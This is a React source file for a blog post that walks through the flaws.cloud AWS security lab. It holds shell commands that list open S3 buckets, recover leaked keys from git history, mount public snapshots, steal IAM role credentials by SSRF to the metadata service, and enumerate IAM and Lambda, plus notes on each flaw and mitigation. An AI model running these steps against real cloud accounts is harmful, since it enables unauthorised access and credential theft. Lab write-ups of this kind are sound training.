import Layouts from "../../Layouts/Layouts";
import Breadcrumb from "../../Breadcrumb/Breadcrumb";
import BlogDetailsAudio from "../../Blog/BlogDetailsAudio";
import BlogDetailsVideo from "../../Blog/BlogDetailsVideo";
import BlogDetailsCode from "../../Blog/BlogDetailsCode";
import Author1 from "../../../assets/img/blogs/authors/1.png";
import Blog13_1 from "../../../assets/img/blogs/details/blog13/1.jpg";
import Blog13_2 from "../../../assets/img/blogs/details/blog13/2.mp3";

function Blog13() {

    const code1 = `**Domain & Bucket Discovery**
# start by getting someinfor on the bucket
# since we're dealing with a domain here, we'll start with a nslookup
nslookup flaws.cloud
host flaws.cloud

# this shows us information about the domain but not everything we need
# lets enumerate further using the IP
dig +short -x 52.218.242.202
host 52.218.242.202

# dig gives a versbose result but using **[+short](https://explainshell.com/explain?cmd=dig+%2Bshort+example.com+%7C+grep+-oE+%22%5Cb%28%5B0-9%5D%7B1%2C3%7D%5C.%29%7B3%7D%5B0-9%5D%7B1%2C3%7D%5Cb%22+%7C+head+-1)** gives a more consice answer
# -x does a reverse lookup and must be paired with an IP address
# the results show that this is a S3 website hosted in **us-west-2**

**Bucket Enumeration**
# lets try to see if we can list the objects in the bucket
aws s3 ls s3://flaws.cloud/ --region us-west-2

# looks like we don't have the credentials to authenticate our s3 API calls
# lets try without credentials
aws s3 ls s3://flaws.cloud/ --region us-west-2 [--no-sign-request](https://docs.aws.amazon.com/cli/latest/reference/)

# with --no-sign-requests, we're telling the CLI not to sign the request or look for credentials
# with this looks like we can list the bucket's objects 
# lets look at the secret file in the browser... nice

# we could have also went on **flaws.cloud.s3.amazonaws.com** since we know it's s3 and we'll find the same info OR
curl -s http://**flaws.cloud.s3.amazonaws.com/ | xmllint --format -**
`;

    const code2 = `# we'll be attempting access again but this time, from an **Authenticated AWS Account**
# start by configuring a profile using creds from an existing user account
aws configure --profile daycyberwox

# input your access key and access key id and set region to us-east-1 
aws s3 --profile daycyberwox ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

# same result as before but this time we have access as an authenticated AWS user
`;

    const code3 = `# start by listing the objects in the bucket as an authenticated AWS user
aws s3 --profile daycyberwox ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

# the aws bucket has a .git file...
# download and list the contents of the s3 bucket to the current directory
aws s3 --profile daycyberwox sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ .
ls -al

# Git log is a utility tool to review and read a history of everything that happens to a repository... so let's see
git log

# the logs show us interesting things, the numbers are the hash for the commits
# so lets check them out
git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61
ls -al

# ooooo some access_keys
cat access_keys.txt

# let's try to access stuff with the access keys
aws configure --profile havoc
aws --profile havoc s3 ls

# money baybee
`;

    const code4 = `# lets look at the host
host 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

# we know there's an ec2 instance here but we can't access it...yet
# lets start by finding the account id using creds from our previous leak
aws --profile havoc sts get-caller-identity

# we can see the "backup user"
# lets now see all the snapshots associated with this user
aws --profile havoc ec2 describe-snapshots --owner-id 975426262029

# we can even see more if we run the same cmd without owner id
aws --profile havoc ec2 describe-snapshots --owner-id

# now that we have the snapshot, we'll wan to mount it aand see what's in it
# first, lets create a volume using the snapshot but specifically in the us-west-2 region
aws --profile daycyberwox ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

# now go into the console **us-west-2** check volumes and you will seee
# then create an instance from the volume by selecting the snaphot in step 4 of instance creations using **/dev/sde** and **delete on termination**
# download the ssh key and put it in your operating folder
mv ~/Dowloads/havoc.pem .

# change the permissions on the key
chmod 400 havoc.pem

# ssh into the instance
ssh -i havoc.pem ubuntu@...

# first list information about all available block devices
lsblk

# xvda1 is our available volume
# mount the volume you added during the creation (**snapshot volume**)
sudo mount /dev/xvde1 /mnt

# check volumes again
lsblk

# dig around
# navigate to /mnt/home/ubuntu ad find the .sh file, grab the creds and login
`;

    const code5 = `# let's use the metadata service to see the instances metadata
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

# we can navigate deep down and explore
# iam looks juicy
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/

# lets dig deeper
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/info

# lets check the other one
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

# access key id and secret access key secured
# now lets create a profile with that
aws configure --profile tornado

# now add you session token in ~/.aws/credentials
nano ~/.aws/credentials
aws_session_token = ..

# list objects
aws --profile tornado s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

# check out the first result
aws --profile tornado s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
`;

    const code6 = `# we already have the access key and secret so lets make profile
aws configure --profile cumulus

**IAM Enumeration**
# whoami
aws --profile cumulus iam get-user

# username appears to be Level6
# this info can be used to find what policies are attached
aws --profile cumulus iam list-attached-user-policies --user-name Level6

****# 2 policies are observed
# now that we have the **arn,** get the **version id**
aws --profile cumulus iam get-policy --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit
aws --profile cumulus iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

# now view **actual policy**
aws --profile cumulus iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1
aws --profile cumulus iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

# for apigateways we can GET all rest apis
# use the permissions allowed by the security audit policy to see things about lambda
aws --region us-west-2 --profile cumulus lambda list-functions

# lets get the policy on the Level6 function
aws --region us-west-2 --profile cumulus lambda get-policy --function-name Level6

# this shows that the **principal** is allowed to execute (**InvokeFunction**) this specified resource: {\\"AWS:SourceArn\\":\\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\\"}
# lets view the **s33ppypa75** rest-api-id
aws --region us-west-2 --profile cumulus apigateway get-stages --rest-api-id "s33ppypa75"

# this tells us that the stage name is "Prod"
# lambda functions are called using that rest-api-id, stage name, region, and resource like:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
`;

    return (
        <Layouts>
            <Breadcrumb breadcrumbText={'Blogs'}/>
            <div className={'!py-[100px]'}>
                <div className={'container mx-auto'}>
                    <div className={'lg:flex items-center justify-between !mb-7'}>
                        <div className={'md:flex items-center gap-10'}>
                            <div className={'flex items-center gap-4 !mb-5 lg:!mb-0'}>
                                <div>
                                    <img src={Author1} alt=""/>
                                </div>
                                <div>
                                    <h4 className={'text-base leading-6 text-[#04040C] font-semibold'}>Dayspring Johnson</h4>
                                </div>
                            </div>
                        </div>
                        <ul className="flex items-center gap-9">
                            <li className="flex items-center gap-2.5">
                                <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M16.7082 9.00045C16.7082 13.2579 13.2573 16.7088 8.99984 16.7088C4.74234 16.7088 1.2915 13.2579 1.2915 9.00045C1.2915 4.74295 4.74234 1.29211 8.99984 1.29211C13.2573 1.29211 16.7082 4.74295 16.7082 9.00045Z" stroke="#828282" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>
                                    <path d="M11.8594 11.4524L8.71777 9.57823V5.53906" stroke="#828282" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>
                                </svg>
                                <span className="text-sm text-[#828282]">Apr 12, 2022</span>
                            </li>
                        </ul>
                    </div>
                    <img src={Blog13_1} className={'!mb-7 rounded-[12px]'} alt=""/>
                    <h1 className={'text-[36px] text-[#1A1A1C] leading-[46px] font-bold !mb-5'}>Exploiting AWS 1 - A Beginner's Guide (Flaws.Cloud)</h1>
                    <p className={'text-[17px] leading-7 text-[#5F6C76] !mb-8'}>Flaws.Cloud - Learn about common mistakes and gotchas when using Amazon Web Services (AWS) including S3, IAM, EC2, and more.</p>
                    <BlogDetailsAudio link={Blog13_2}/>
                    <p className={'text-[17px] leading-7 text-[#5F6C76] !mb-10 !mt-5'}>This is my walkthrough for flaws.cloud by <a href="http://flaws.cloud/" className={'underline'} target={'_blank'} rel={'noreferrer'}>summit route</a></p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-6'}>Full video walkthrough:</h3>
                    <BlogDetailsVideo link={'https://www.youtube.com/watch?v=Suxqxd74a_Q'}/>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level1</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-2.5'}>Buckets of fun:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76] !mb-5'}>Dead giveaway for S3 buckets and static websites can be hosted on S3</p>
                    <BlogDetailsCode code={code1}/>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-7 !mb-4'}>Vulnerability:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Bucket's listing has it’s access permission set to "Everyone", yeah we don’t want that</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level2</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-5'}>Unauthorized Authenticated Access</h6>
                    <BlogDetailsCode code={code2}/>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-7 !mb-4'}>Vulnerability:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Bucket's listing has access permission set to "Any Authenticated AWS User", violating the principle of least privilege</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level3</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-5'}>Leaked secrets</h6>
                    <BlogDetailsCode code={code3}/>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-7 !mb-4'}>Vulnerability:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Bucket listing gives access to 'Everyone' and leaks AWS keys by accidentally committing it to git repo kept in the bucket. Leaked keys should be immediately revoked</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level4</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-5'}>Leaked & Unencrypted snapshots</h6>
                    <BlogDetailsCode code={code4}/>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-7 !mb-4'}>Vulnerability:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Publicly accessible EC2 snapshots</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level5</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-5'}>Metadata, too much data</h6>
                    <BlogDetailsCode code={code5}/>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-7 !mb-4'}>Vulnerability:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Exposed proxy which doesn't restrict access to instance's meta-data server and private IP range</p>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mt-8 !mb-4'}>Mitigation:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-5 !mt-7'}>Level6</h3>
                    <h6 className={'text-[18px] font-semibold text-[#272728] !mb-2.5'}>SecurityAudit Policy:</h6>
                    <p className={'text-[17px] leading-7 text-[#5F6C76] !mb-5'}>Too much permission</p>
                    <BlogDetailsCode code={code6}/>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-4 !mt-7'}>Vulnerability:</h3>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>The securityaudit policy allow read access to IAM policies which can help an attacker scope an environment easily</p>
                    <h3 className={'text-[28px] font-bold leading-9 text-[#1A1A1C] !mb-4 !mt-7'}>Mitigation:</h3>
                    <p className={'text-[17px] leading-7 text-[#5F6C76]'}>Don't hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are. Only enough permissions to do the job.</p>
                    <div className="flex items-center gap-8 !mt-10">
                        <p className="font-medium text-base text-[#5F6C76]">Share this post: </p>
                        <div className="flex items-start gap-[30px]">
                            <a href="https://www.linkedin.com/in/dayspringjohnson/?fbclid=IwAR1NBvGpFwDH2puRt89zN4TdYzNBzlXQ23T3BxutDbrhSTsrNpW1xG21NE4" target={'_blank'} rel={'noreferrer'}>
                                <svg width="19" height="18" viewBox="0 0 19 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M4.36198 2.58425C4.36173 3.07049 4.16835 3.5367 3.82436 3.88034C3.48038 4.22399 3.01396 4.41691 2.52773 4.41667C2.0415 4.41643 1.57528 4.22304 1.23164 3.87905C0.887987 3.53506 0.695065 3.06865 0.695313 2.58242C0.69556 2.09619 0.88894 1.62997 1.23293 1.28632C1.57692 0.942683 2.04334 0.749762 2.52956 0.75C3.01579 0.750248 3.48202 0.943637 3.82566 1.28763C4.16931 1.63161 4.36223 2.09802 4.36198 2.58425ZM4.41698 5.77425H0.750313V17.2509H4.41698V5.77425ZM10.2103 5.77425H6.56198V17.2509H10.1736V11.2284C10.1736 7.8734 14.5461 7.56173 14.5461 11.2284V17.2509H18.167V9.98173C18.167 4.32592 11.6953 4.53675 10.1736 7.31423L10.2103 5.77425Z" fill="#1A1A1C"/>
                                </svg>
                            </a>
                            <a href="https://twitter.com/DayCyberwox?fbclid=IwAR1NBvGpFwDH2puRt89zN4TdYzNBzlXQ23T3BxutDbrhSTsrNpW1xG21NE4" target="_blank" rel={'noreferrer'}>
                                <svg width="21" height="17" viewBox="0 0 21 17" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M20.1962 2.68178C19.4689 3.00078 18.694 3.21222 17.8862 3.31489C18.7173 2.81867 19.3516 2.03889 19.6498 1.099C18.8749 1.561 18.0194 1.88734 17.1076 2.06945C16.3718 1.286 15.3232 0.800781 14.1792 0.800781C11.9596 0.800781 10.1727 2.60234 10.1727 4.81089C10.1727 5.12867 10.1996 5.43422 10.2656 5.72511C6.93262 5.56256 3.9834 3.96511 2.00218 1.53167C1.65629 2.13178 1.4534 2.81867 1.4534 3.55811C1.4534 4.94656 2.1684 6.17734 3.23418 6.88989C2.59006 6.87767 1.95818 6.69067 1.42284 6.39611C1.42284 6.40834 1.42284 6.42422 1.42284 6.44011C1.42284 8.38834 2.81251 10.0066 4.63484 10.3793C4.30851 10.4686 3.95284 10.5113 3.58373 10.5113C3.32706 10.5113 3.06795 10.4967 2.82473 10.4429C3.34418 12.0306 4.81818 13.1978 6.57084 13.2357C5.20684 14.3027 3.47495 14.9456 1.60006 14.9456C1.27129 14.9456 0.955958 14.9309 0.640625 14.8906C2.41651 16.0358 4.52118 16.6897 6.79084 16.6897C14.1682 16.6897 18.2015 10.5786 18.2015 5.28145C18.2015 5.10422 18.1954 4.93311 18.1868 4.76322C18.9825 4.19856 19.651 3.49334 20.1962 2.68178Z" fill="#1A1A1C"/>
                                </svg>
                            </a>
                            <a href="https://www.instagram.com/DayCyberwox/?fbclid=IwAR2QMOkHInPPTOV_nygxdL4X3WjOIQ7niH5pdQASypCJGzqVxE_nwsY3qCc" target="_blank" rel={'noreferrer'}>
                                <svg width="19" height="18" viewBox="0 0 19 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M6.52539 0H13.2754C16.3816 0 18.9004 2.51887 18.9004 5.625V12.375C18.9004 15.4812 16.3816 18 13.2754 18H6.52539C3.41926 18 0.900391 15.4812 0.900391 12.375V5.625C0.900391 2.51887 3.41926 0 6.52539 0ZM13.2754 16.3125C15.4467 16.3125 17.2129 14.5462 17.2129 12.375V5.625C17.2129 3.45375 15.4467 1.6875 13.2754 1.6875H6.52539C4.35414 1.6875 2.58789 3.45375 2.58789 5.625V12.375C2.58789 14.5462 4.35414 16.3125 6.52539 16.3125H13.2754Z" fill="#1A1A1C"/>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M5.40039 9C5.40039 6.51487 7.41527 4.5 9.90041 4.5C12.3856 4.5 14.4004 6.51487 14.4004 9C14.4004 11.4852 12.3856 13.5 9.90041 13.5C7.41527 13.5 5.40039 11.4852 5.40039 9ZM7.08789 9C7.08789 10.5502 8.35014 11.8125 9.90041 11.8125C11.4507 11.8125 12.7129 10.5502 12.7129 9C12.7129 7.44862 11.4507 6.1875 9.90041 6.1875C8.35014 6.1875 7.08789 7.44862 7.08789 9Z" fill="#1A1A1C"/>
                                    <path d="M14.7383 4.76175C15.0695 4.76175 15.3379 4.49329 15.3379 4.16212C15.3379 3.83096 15.0695 3.5625 14.7383 3.5625C14.4071 3.5625 14.1387 3.83096 14.1387 4.16212C14.1387 4.49329 14.4071 4.76175 14.7383 4.76175Z" fill="#1A1A1C"/>
                                </svg>
                            </a>
                            <a href="https://www.youtube.com/@DayCyberwox/videos" target="_blank" rel={'noreferrer'}>
                                <svg width="20" height="18" viewBox="0 0 20 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <g clip-path="url(#clip0_321_335)">
                                        <path d="M3.73258 7.49094C5.49341 6.32096 7.43198 5.69401 9.58052 5.63378C9.91941 4.00567 10.2593 2.3904 10.5913 0.774144C10.7505 -0.0018965 10.8462 -0.0680475 11.6041 0.0869632C12.5904 0.288378 13.5758 0.490781 14.5661 0.665538C14.7185 0.692196 14.9411 0.617159 15.0554 0.507565C15.5906 -0.00782043 16.2908 -0.150983 16.8875 0.171873C17.4608 0.482882 17.7889 1.16908 17.659 1.78813C17.5145 2.47433 17.0213 2.93442 16.3621 2.99958C15.6052 3.07462 15.0857 2.72708 14.7712 1.98066C14.7068 1.82861 14.5407 1.65188 14.3923 1.61831C13.445 1.40307 12.4889 1.22437 11.4839 1.02394C11.1597 2.58886 10.8374 4.14094 10.5083 5.73054C12.6149 5.82927 14.5524 6.40587 16.2918 7.60449C16.9393 7.08811 17.6415 6.86794 18.4413 7.1207C19.2568 7.37839 19.7783 7.94215 19.9482 8.77447C20.1221 9.62456 19.8642 10.3591 19.1972 10.9407C19.0576 11.0621 18.8974 11.2635 18.8974 11.4274C18.9013 13.5689 17.8788 15.123 16.1785 16.2634C13.9577 17.7532 11.4751 18.1758 8.86467 17.9389C7.02474 17.771 5.302 17.2211 3.78727 16.1153C2.22372 14.9739 1.24906 13.5038 1.29203 11.4709C1.29496 11.3257 1.19535 11.1253 1.07913 11.0384C-0.0586175 10.1804 -0.324255 8.93837 0.417968 7.86021C1.1475 6.80179 2.4376 6.6221 3.59586 7.4169C3.63395 7.44257 3.67789 7.46133 3.73258 7.49094ZM11.9469 10.7827C11.9498 11.6456 12.6549 12.3308 13.5524 12.3437C14.2849 12.3535 14.9275 11.618 14.9177 10.7797C14.9079 9.90398 14.2604 9.25925 13.404 9.27209C12.5729 9.28492 11.9429 9.93656 11.9469 10.7827ZM6.44072 12.2084C7.25717 12.2015 7.93591 11.5173 7.93787 10.6998C7.93982 9.86745 7.23764 9.18323 6.39385 9.19606C5.57252 9.20791 4.91526 9.89213 4.92795 10.7225C4.94163 11.5489 5.61939 12.2153 6.44072 12.2084ZM9.8823 16.0501C11.3951 16.0748 12.2838 15.8102 13.4918 15.0351C13.736 14.8791 13.9548 14.7271 13.7702 14.4279C13.5758 14.113 13.3122 14.2285 13.0524 14.3884C11.0337 15.6325 9.00823 15.6216 6.98567 14.3993C6.73078 14.2453 6.47588 14.1001 6.26591 14.4161C6.04813 14.7429 6.30204 14.9236 6.54131 15.0835C7.57554 15.7727 8.71427 16.0906 9.8823 16.0501Z" fill="black"/>
                                    </g>
                                    <defs>
                                        <clipPath id="clip0_321_335">
                                            <rect width="20" height="18" fill="white"/>
                                        </clipPath>
                                    </defs>
                                </svg>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </Layouts>
    )
}

export default Blog13;
